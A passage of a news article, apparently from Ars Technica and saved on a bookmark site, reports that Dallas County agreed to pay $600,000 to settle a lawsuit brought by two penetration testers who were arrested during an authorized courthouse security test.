Within minutes, deputies arrived and confronted the two intruders. DeMercurio and Wynn produced an authorization letter—known as a “get out of jail free card” in pen-testing circles. After a deputy called one or more of the state court officials listed in the letter and got confirmation it was legit, the deputies said they were satisfied the men were authorized to be in the building. DeMercurio and Wynn spent the next 10 or 20 minutes telling what their attorney in a court document called “war stories” to deputies who had asked about the type of work they do.

When Sheriff Leonard arrived, the tone suddenly changed. He said the Dallas County Courthouse was under his jurisdiction and he hadn’t authorized any such intrusion. Leonard had the men arrested, and in the days and weeks to come, he made numerous remarks alleging the men violated the law. A couple months after the incident, he told me that surveillance video from that night showed “they were crouched down like turkeys peeking over the balcony” when deputies were responding. I published a much more detailed account of the event here. Eventually, all charges were dismissed.

DeMercurio and Wynn sued Dallas County and Leonard for false arrest, abuse of process, defamation, intentional infliction of emotional distress, and malicious prosecution. The case dragged on for years. Last Thursday, five days before a trial was scheduled to begin in the case, Dallas County officials agreed to pay $600,000 to settle the case.

It’s hard to overstate the financial, emotional, and professional stresses that result when someone is locked up and repeatedly accused of criminal activity for performing authorized work that’s clearly in the public interest. DeMercurio has now started his own firm, Kaiju Security.

“The settlement confirms what we have said from the beginning: our work was authorized, professional, and done in the public interest,” DeMercurio said. “What happened to us never should have happened. Being arrested for doing the job we were hired to do turned our lives upside down and damaged reputations we spent years building.”

arstechnica.com EN 2026 pentesters authorized arrested
5032 links
Shaarli - The personal, minimalist, database-free bookmark manager by the Shaarli community - Theme by kalvn